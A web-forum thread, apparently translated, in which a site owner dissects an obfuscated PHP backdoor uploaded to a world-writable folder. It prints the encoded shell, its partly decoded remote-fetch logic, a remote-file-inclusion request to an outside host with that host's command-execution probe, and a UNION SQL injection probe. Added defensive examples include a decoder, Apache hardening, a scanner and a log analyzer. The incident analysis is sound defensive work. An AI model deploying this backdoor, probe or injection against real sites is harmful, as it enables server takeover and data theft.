Hacker puzzle

Hello,
they hacked one site, somehow they managed to upload a PHP file into a directory with 777 permissions.
Through this file they could probably browse the whole www directory and modify everything that was 777. They did no damage and I have already restored things from backups and secured the hole, but still
The contents of the malicious file look like this:

<?php
// Important system file. Don't change anything.
if(@$_REQUEST['soulfly']=='1'){eval(gzinflate(base64_decode('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')));}else{eval(gzinflate(base64_decode('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')));}
?>

I decoded this by hand n times, down to this stage:

<?php
error_reporting(0);              // silence every warning and notice
set_time_limit(0);
@set_magic_quotes_runtime(0);
if(SSSSS())exit;                 // if the remote fetch succeeds its output replaces the real page
function SSSSS(){$SSSSS=SSSSSSS("AwA=");           // SSSSSSS("AwA=") decodes to the empty string
$SSSSSS=@$_REQUEST[SSSSSSS("q0jLAwA=")];           // the request parameter name is itself an encoded string
if($SSSSSS){$SSSSS=$SSSSSS;
}elseif($SSSSSSS=trim(@$_REQUEST[SSSSSSS("KwQA")])){$SSSSS=SSSSSSS("K05NLErO0CvIKLAvtAUA").urlencode($SSSSSSS).SSSSSSS("U6vILLAFAA==").urlencode($_SERVER[SSSSSSS("C3L19Q9xjXd0cQkCAA==")]);
}if($SSSSS){if(($SSSSSSSS=SSSSSS(SSSSSSS("K83LLCxNLSlKTM5OLdJLyQIA"),$SSSSS))!==false){echo $SSSSSSSS;
return true;
}}return false;
}function SSSSSS($SSSSS,$SSSSSS){$SSSSSSS=SSSSSSS("AwA=");   // connect to host $SSSSS on port 80, send a request for $SSSSSS, return the body
if($SSSSSSSS=@fsockopen($SSSSS,80,$SSSSSSSSS,$SSSSSSSSSS,15)){$SSSSSSSSSSS=eval("return \"".SSSSSSS("iymKyQMA")."\";
");
if(!@fwrite($SSSSSSSS,eval("return \"".SSSSSSS("c3cNUdAHAA==")."\";
").$SSSSSS.eval("return \"".SSSSSSS("U/AICQnQN9QzAAA=")."\";
").$SSSSSSSSSSS.eval("return \"".SSSSSSS("88gvLrFSAAA=")."\";
").$SSSSS.$SSSSSSSSSSS.eval("return \"".SSSSSSS("c0xOTi0o0XXOSCwqTi2xUgAA")."\";
").$_SERVER[SSSSSSS("8wgJCYh3dHZ2DQiJd/ZwDAp2DQEA")].$SSSSSSSSSSS.eval("return \"".SSSSSSS("c0xOTi0o0fVJzEsvTUxPtVIAAA==")."\";
").$_SERVER[SSSSSSS("8wgJCYh3dHZ2DQiJ93H0cw91dHcFAA==")].$SSSSSSSSSSS.eval("return \"".SSSSSSS("Cy1OLdJ1TE/NK7FSAAA=")."\";
").$_SERVER[SSSSSSS("8wgJCYgPDXYNind0d/ULAQA=")].$SSSSSSSSSSS.eval("return \"".SSSSSSS("C0pNSy1KLbJSAAA=")."\";
").urlencode($_SERVER[SSSSSSS("8wgJCYgPDXYNig9ydXMNcg0CAA==")]).$SSSSSSSSSSS.eval("return \"".SSSSSSS("c87Py0tNLsnMz7NScM7JL04FAA==")."\";
").$SSSSSSSSSSS.$SSSSSSSSSSS)){@fclose($SSSSSSSS);
return false;
}$SSSSSSSSSSSS=0;
$SSSSSSSSSSSSS=SSSSSSS("AwA=");
$SSSSSSSSSSSSSS=SSSSSSS("AwA=");
while(!@feof($SSSSSSSS)){$SSSSSSSSSSSSS.=@fread($SSSSSSSS,2048*4);
if($SSSSSSSSSSSS===0){$SSSSSSSSSSSS=false;
if(substr($SSSSSSSSSSSSS,9,3)!=SSSSSSS("MzIwAAA=")){@fclose($SSSSSSSS);   // "200": give up unless the remote server answered HTTP 200
return false;
}}if(!$SSSSSSSSSSSS){if(($SSSSSSSSSSSSSSS=strpos($SSSSSSSSSSSSS,eval("return \"".SSSSSSS("iymKyYsBYgA=")."\";
")))!==false){$SSSSSSSSSSSSSS.=substr($SSSSSSSSSSSSS,0,$SSSSSSSSSSSSSSS);
$SSSSSSS.=substr($SSSSSSSSSSSSS,$SSSSSSSSSSSSSSS+4);
$SSSSSSSSSSSSS=SSSSSSS("AwA=");
$SSSSSSSSSSSS=true;
}else{$SSSSSSSSSSSSSS.=$SSSSSSSSSSSSS;
}}else{$SSSSSSS.=$SSSSSSSSSSSSS;
$SSSSSSSSSSSSS=SSSSSSS("AwA=");
}}@fclose($SSSSSSSS);
foreach(explode(eval("return \"".SSSSSSS("i8kDAA==")."\";
"),$SSSSSSSSSSSSSS)as $SSSSSSSSSSSSSSSS){if($SSSSSSSSSSSSSSSS=trim($SSSSSSSSSSSSSSSS)){if(count($SSSSSSSSSSSSSSS=explode(SSSSSSS("swIA"),$SSSSSSSSSSSSSSSS))==2){@header($SSSSSSSSSSSSSSSS,true);
if(substr(trim($SSSSSSSSSSSSSSS[1]),0,4)==SSSSSSS("K0mtKAEA")){$SSSSSSS=preg_replace(SSSSSSS("09fIKEpNqykuSta01YhWAgA=").eval("return \"".SSSSSSS("UwcA")."\";
").SSSSSSS("i9WM0YvR14iOUwIA").eval("return \"".SSSSSSS("UwcA")."\";
").SSSSSSS("i9XStI8x0s8sBgA="),SSSSSSS("izG0jTGyr0jLs40xjjECAA=="),$SSSSSSS);
$SSSSSSS=preg_replace(SSSSSSS("07fJTS1JVMgoKSnQTS0szSyzVSpKTStKLc5Qio6zi9Wyt9PPLAYA"),SSSSSSS("s8lNLUlUyCgpKdBNLSzNLLNVKkpNK0otzlBSSM7PK0nNK7FVMjMwsFYIDfKxBQA=").urldecode($_SERVER[SSSSSSS("C3INDHUNDokPDfIEAA==")]).SSSSSSS("U7IDAA=="),$SSSSSSS);
$SSSSSSS=preg_replace(SSSSSSS("009MLsnMz7NVKk5NLErO0CvIKFDSzywGAA=="),SSSSSSS("AwA="),$SSSSSSS);
$SSSSSSS=preg_replace(SSSSSSS("089NLcnIT7FVKsgvLlHSzywGAA=="),SSSSSSS("y00tychPsVVKTy1RAgA="),$SSSSSSS);
}}}}unset($SSSSSSSSSSSSSS);
return $SSSSSSS;
}return false;
}function SSSSSSS($v){return eval(base64_decode("cmV0dXJuIGd6aW5mbGF0ZShiYXNlNjRfZGVjb2RlKCR2KSk7"));   // plain base64 of: return gzinflate(base64_decode($v));
}

?>

Is any of this clearer to anyone? :)
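Decoding these layers by hand, as done above, gets tedious. The script below does the same thing statically, as an added example that is not part of the original post. It assumes the wrapper has exactly the shape eval(gzinflate(base64_decode('...'))) and that the seven-S helper is the one in the listing (gzinflate of base64). Nothing is executed: each layer is inflated with zlib and substituted for the eval() that wrapped it. The nested payload it unwraps is constructed here, not the thread's actual blob; the two short helper literals it decodes ("AwA=" and "MzIwAAA=") are taken from the listing.

```python
"""Static unwrapping of eval(gzinflate(base64_decode('...'))) layers."""
import base64
import re
import zlib

# outer wrapper as it appears in the uploaded file (the base64 may span lines)
EVAL_LAYER = re.compile(
    r"eval\(gzinflate\(base64_decode\('([A-Za-z0-9+/=\s]+)'\)\)\);?")
# the 7-S helper from the listing: SSSSSSS($v) == gzinflate(base64_decode($v))
HELPER_CALL = re.compile(r'SSSSSSS\("([A-Za-z0-9+/=]*)"\)')


def gzinflate(b64):
    """PHP gzinflate(base64_decode($v)): a raw DEFLATE stream, no zlib/gzip header."""
    raw = base64.b64decode(re.sub(r"\s+", "", b64))
    return zlib.decompress(raw, -15)  # wbits=-15 selects raw deflate


def gzdeflate_b64(text):
    """Inverse of gzinflate(); used only to build the constructed sample below."""
    co = zlib.compressobj(9, zlib.DEFLATED, -15)
    return base64.b64encode(co.compress(text.encode()) + co.flush()).decode()


def strip_php_tags(code):
    return re.sub(r"^\s*<\?php\s*|\s*\?>\s*$", "", code.strip())


def unwrap(php, max_layers=20):
    """Replace every eval(gzinflate(base64_decode('..'))) by its decoded body
    and repeat until no wrapper is left. Returns (code, layers_removed)."""
    layers = 0
    for _ in range(max_layers):
        new = EVAL_LAYER.sub(
            lambda m: strip_php_tags(gzinflate(m.group(1)).decode("latin-1")), php)
        if new == php:
            break
        php, layers = new, layers + 1
    return php, layers


def php_quote(s):
    """Render s as a PHP single-quoted literal."""
    return "'" + s.replace("\\", "\\\\").replace("'", "\\'") + "'"


def inline_helper_strings(php):
    """Replace SSSSSSS("...") calls by the string literal they return."""
    return HELPER_CALL.sub(
        lambda m: php_quote(gzinflate(m.group(1)).decode("latin-1")), php)


# constructed sample: two wrapper layers around a harmless echo
INNER = 'echo "hello";'
SAMPLE = "<?php eval(gzinflate(base64_decode('%s'))); ?>" % gzdeflate_b64(
    "<?php eval(gzinflate(base64_decode('%s'))); ?>" % gzdeflate_b64(INNER))

if __name__ == "__main__":
    code, n = unwrap(SAMPLE)
    print(n, "layers ->", code)
    # two literals from the listing, decoded without running anything
    print(inline_helper_strings('SSSSSSS("AwA=") SSSSSSS("MzIwAAA=")'))
```

Run inline_helper_strings() over the decoded listing and the comparisons become readable (the status check turns into `!='200'`, the empty initialisers into `''`). Anything the script cannot decode statically, such as the eval("return \"...\"") string-building, it leaves in place rather than executing.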

20 replies

all those strings in the style of "089NLcnIT7FVKsgvLlHSzywGAA==" are (zipped and) base64 encoded... it then evals those strings, so you can't tell what it does

you can decode base64 e.g. here: http://www.motobit.com/util/base64-decoder-encoder.asp

e.g. the last function, the one with 7 "S", evals the string "return gzinflate(base64_decode($v));"

replace the script with a PHP script that sends the details of whoever lands on it to your e-mail, which is on some other server.

It depends on how the server is set up, but they could access everything your PHP can. If PHP can reach the command line, they could also have had "simulated" ssh access.

can httpd.conf be configured with some regex so that PHP is disabled in all directories starting with uploads/?

<Directory ~ "^/var/www/html(.*?)upload(.*?)">
    AddHandler default-handler php
</Directory>

this works
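A hardened variant of the directive above, added here as an example rather than taken from the thread. It assumes mod_php (php_admin_flag is a mod_php directive and does nothing for PHP-FPM behind mod_proxy_fcgi, where the FilesMatch deny is what counts), Apache 2.4 access-control syntax and the same /var/www/html web root. The commented-out stanza is the weak shape to avoid; the second is the replacement. The AddHandler trick from the post only works when PHP is bound to the extension through AddHandler/AddType in the first place; denying the files outright does not depend on that.

```apache
# Weak: uploads live in a world-writable directory and PHP still runs there,
# so any uploaded .php file becomes a remote shell.
#<Directory "/var/www/html/uploads">
#    Options Indexes FollowSymLinks
#    AllowOverride All
#</Directory>

# Hardened: every directory under the web root whose path contains "upload"
<DirectoryMatch "^/var/www/html/.*upload">
    # mod_php only: switch the interpreter off; unlike php_flag this cannot be
    # re-enabled from a .htaccess file
    php_admin_flag engine off
    # ignore .htaccess entirely; forbid CGI, SSI and symlinks out of the tree
    AllowOverride None
    Options -ExecCGI -Includes -FollowSymLinks
    # refuse to serve anything PHP-like at all
    # (Apache 2.2 equivalent: Order deny,allow / Deny from all)
    <FilesMatch "(?i)\.(php[0-9]?|phtml|phar|phps)$">
        Require all denied
    </FilesMatch>
</DirectoryMatch>
```

After a reload, confirm it from the outside: upload a file containing `<?php phpinfo(); ?>` through the normal form and request it; you should get 403, not a phpinfo page and not the raw source.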

And this is what the logs look like:

==0d239948==============================
Request: domena.com 88.86.113.194 - - [18/Jan/2009:04:51:17 +0100] "GET /uploads/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ecf.cl/portal/cache/rss40.xml?? HTTP/1.1" 403 402 "-" "Mozilla/4.61 en" t@qwWFu5wUAAATCwdiQAAAAH "-"

this is just a failed attempt, because the site isn't running the Mambo/Joomla CMS

the content of the xml file is this:

<html><head><title>/// Response CMD ///</title></head><body bgcolor=DC143C>
<H1>Changing this CMD will result in corrupt scanning !</H1>
</html></head></body>
<?php
// scanner probe: can commands be run on this host (safe_mode off)?
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafemodeOFF");
}
else{
ini_restore("safe_mode");
ini_restore("open_basedir");
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafemodeOFF");
}else{
echo("Safe Mode of this Server is : ");
echo("SafemodeON");
}
}
function ex($cfe){   // run a command through whichever execution function is not disabled
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);   // exec() fills an array of output lines
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
exit;

Who can be bothered to hack sites on a Sunday anyway?!?!??!

Who can be bothered to hack sites on a Sunday anyway?!?!??!

Do you think they sit next to the box watching whether the hack succeeds LOL

Btw.
If you took a bit better care of security this wouldn't happen... There are thousands of such requests per day ... :)

Ah yes, scripts? Preferably paid ones that some hacker puts together, and then they're full of evals :). Well, the same happens with WP templates too ... :)

On a Sunday? It could just as well be any other day, boredom probably ...

janko: Thanks

dbMG: thanks for the great post... you're a legend

hexer: well... :) it was on a Sunday

Heh :D

Decode it to the end and throw it out if you don't need that code; there is probably some footer or something inside, something meant to discourage you from removing it. It is recommended that you remove it though .... :)

Everything has already been restored from backups and the hole secured (PHP doesn't run in any of the directories where uploads are possible. I hope that's enough). The malicious code has been removed from the server entirely. The uploader already checks the mime type, but that can be faked from the browser; it has to be checked server side - http://si2.php.net/finfo_file

If anyone would like to scan their server, here is a python script.

import os

# walk the web root and flag PHP files that contain all three tell-tale calls
for dirpath, dirs, files in os.walk("/var/www/html"):
    for name in files:
        if name.endswith(".php"):
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="latin-1", errors="replace") as fh:
                f = fh.read()
            if 'eval(' in f and 'base64_decode' in f and 'gzinflate' in f:
                print('stuff! [' + path + ']')

Regards
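The three-substring test above catches exactly the file from this thread but misses a shell that builds the decoder call from pieces or uses str_rot13 instead of gzinflate. The scanner below, added here as an example and not the poster's script, scores several indicators per file and reports anything over a threshold. The indicator weights, the threshold and the two sample files it scans are constructed assumptions; tune the weights against your own tree before trusting a clean result.

```python
"""Indicator-based scan of a web root for obfuscated PHP (added example)."""
import os
import re
import tempfile

# (name, regex, weight); the weights are a judgement call, not a standard
INDICATORS = [
    ("eval-of-decoded-blob",
     re.compile(r"\beval\s*\(\s*(?:gzinflate|gzuncompress|str_rot13|base64_decode)\s*\(", re.I), 5),
    ("long-base64-literal", re.compile(r"['\"][A-Za-z0-9+/]{200,}={0,2}['\"]"), 3),
    ("request-gated-eval",
     re.compile(r"\$_(?:REQUEST|GET|POST|COOKIE)\b.*\beval\s*\(", re.I | re.S), 3),
    ("preg_replace-e-modifier",
     re.compile(r"preg_replace\s*\(\s*['\"].*?/[a-z]*e[a-z]*['\"]", re.S), 3),
    ("same-letter-identifiers", re.compile(r"\$([A-Za-z])\1{3,}\b"), 2),
    ("command-execution",
     re.compile(r"\b(?:exec|shell_exec|system|passthru|popen|proc_open)\s*\(", re.I), 1),
    ("suppressed-socket-or-ini",
     re.compile(r"@\s*(?:fsockopen|ini_restore|set_magic_quotes_runtime)\s*\("), 1),
]
THRESHOLD = 5
PHP_EXTS = (".php", ".php3", ".php4", ".php5", ".phtml", ".inc")


def score_source(src):
    """Return (score, [matching indicator names]) for one file's contents."""
    hits = [(name, w) for name, rx, w in INDICATORS if rx.search(src)]
    return sum(w for _n, w in hits), [n for n, _w in hits]


def scan_tree(root):
    """Walk root and return [(path, score, hits)] at or above THRESHOLD, worst first."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(PHP_EXTS):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, encoding="latin-1", errors="replace") as fh:
                score, hits = score_source(fh.read())
            if score >= THRESHOLD:
                findings.append((path, score, hits))
    return sorted(findings, key=lambda f: -f[1])


# constructed samples, not files from the thread
MALICIOUS_SAMPLE = ('<?php if(@$_REQUEST["k"]=="1"){eval(gzinflate(base64_decode("'
                    + "QUJD" * 80 + '")));} ?>')
CLEAN_SAMPLE = '<?php echo htmlspecialchars($_GET["q"], ENT_QUOTES); ?>'


def demo():
    """Write both samples into a temporary web root and scan it."""
    with tempfile.TemporaryDirectory() as root:
        for name, src in (("shell.php", MALICIOUS_SAMPLE), ("clean.php", CLEAN_SAMPLE)):
            with open(os.path.join(root, name), "w") as fh:
                fh.write(src)
        return [(os.path.basename(p), s, h) for p, s, h in scan_tree(root)]


if __name__ == "__main__":
    for name, score, hits in demo():
        print(f"{score:3d} {name}: {', '.join(hits)}")
```

For a real run replace demo() with scan_tree("/var/www/html"). Expect a few legitimate hits from libraries that ship base64-embedded images or minified code; the useful signal is a file scoring on eval-of-decoded-blob or request-gated-eval, which a clean CMS install should never do.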

Here's another puzzle: what exactly does it achieve with CONCAT()?

450 and 1=2 union select
CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)
/*

It's some kind of SQL injection, I just don't understand why with the characters |_| ?

In short, some botnet has appeared that sends queries like this; has anyone else noticed? One page got about 500 requests with this query between 5:00 and 5:03. Of course every request comes from a different IP. Another little wannabe ...

HTTP_USER_AGENT: ati2qs
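Both logged requests in this thread, the Mambo/Joomla remote-include attempt earlier and the UNION probe above, can be picked out of an access log mechanically. The script below is an added example, not something posted in the thread. MySQL accepts 0x27 and friends as string literals, so CONCAT(0x27,0x7c,0x5f,0x7c) is simply the text '|_| with no quote character in the request; injecting that into every column of a UNION and then searching the response for |_| tells the scanner whether the column count fits and which columns are rendered, while "and 1=2" empties the original result so only the injected rows show. The log lines, hostnames and column count below are constructed for the example.

```python
"""Flag UNION column probes and remote-include attempts in access-log lines."""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

HEX_LITERAL = re.compile(r"0x([0-9A-Fa-f]+)")
UNION_SELECT = re.compile(r"\bunion\b\s+(?:all\s+)?select\b", re.I)
REQUEST_PATH = re.compile(r'"(?:GET|POST)\s+(\S+)')
REMOTE_URL = re.compile(r"^(?:https?|ftps?)://", re.I)


def decode_hex_literals(expr):
    """Concatenate every 0x.. literal in expr as text (what CONCAT() yields)."""
    out = []
    for h in HEX_LITERAL.findall(expr):
        out.append(bytes.fromhex(h if len(h) % 2 == 0 else "0" + h).decode("latin-1"))
    return "".join(out)


def analyse_probe(value):
    """For a 'union select' payload return (column_count, {marker strings}),
    otherwise None. Commas inside parentheses do not separate columns."""
    m = UNION_SELECT.search(value)
    if not m:
        return None
    select_list = value[m.end():].split("/*", 1)[0]
    cols = [c.strip() for c in re.split(r",(?![^()]*\))", select_list) if c.strip()]
    return len(cols), {decode_hex_literals(c) for c in cols}


def remote_include_params(path):
    """Query parameters whose value is a URL: the shape of an RFI attempt."""
    pairs = parse_qsl(urlsplit(path).query, keep_blank_values=True)
    return [(k, v) for k, v in pairs if REMOTE_URL.match(v)]


def flag_log_line(line):
    """Extract the request path from a combined-format line and classify it."""
    m = REQUEST_PATH.search(line)
    if not m:
        return None
    raw = m.group(1)
    return {"rfi": remote_include_params(raw), "union": analyse_probe(unquote_plus(raw))}


# constructed inputs: the probe from the post, and two log lines
PROBE = "450 and 1=2 union select " + ",".join(["CONCAT(0x27,0x7c,0x5f,0x7c)"] * 23) + "/*"
SQLI_LOG = ('10.0.0.1 - - [18/Jan/2009:05:01:12 +0100] "GET /index.php?id=450%20and%201%3D2'
            '%20union%20select%20CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)/*'
            ' HTTP/1.1" 200 4132 "-" "ati2qs"')
RFI_LOG = ('10.0.0.2 - - [18/Jan/2009:04:51:17 +0100] "GET /uploads/index.php?_REQUEST=&'
           '_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&'
           'mosConfig_absolute_path=http://example.invalid/rss40.xml?? HTTP/1.1" 403 402 "-" "Mozilla/4.61 en"')
NORMAL_LOG = '10.0.0.3 - - [18/Jan/2009:05:02:00 +0100] "GET /index.php?id=450 HTTP/1.1" 200 9001 "-" "x"'

if __name__ == "__main__":
    print(analyse_probe(PROBE))      # (23, {"'|_|"})
    for line in (SQLI_LOG, RFI_LOG, NORMAL_LOG):
        print(flag_log_line(line))
```

The column count is the interesting number: a bot that sends the same 23-column probe to every site is matching a layout it already knows, so a burst of identical probes from many IPs, as described above, is a scan rather than a targeted attack. Feed the whole log through flag_log_line() and group by user agent and column count to see which campaign you are looking at.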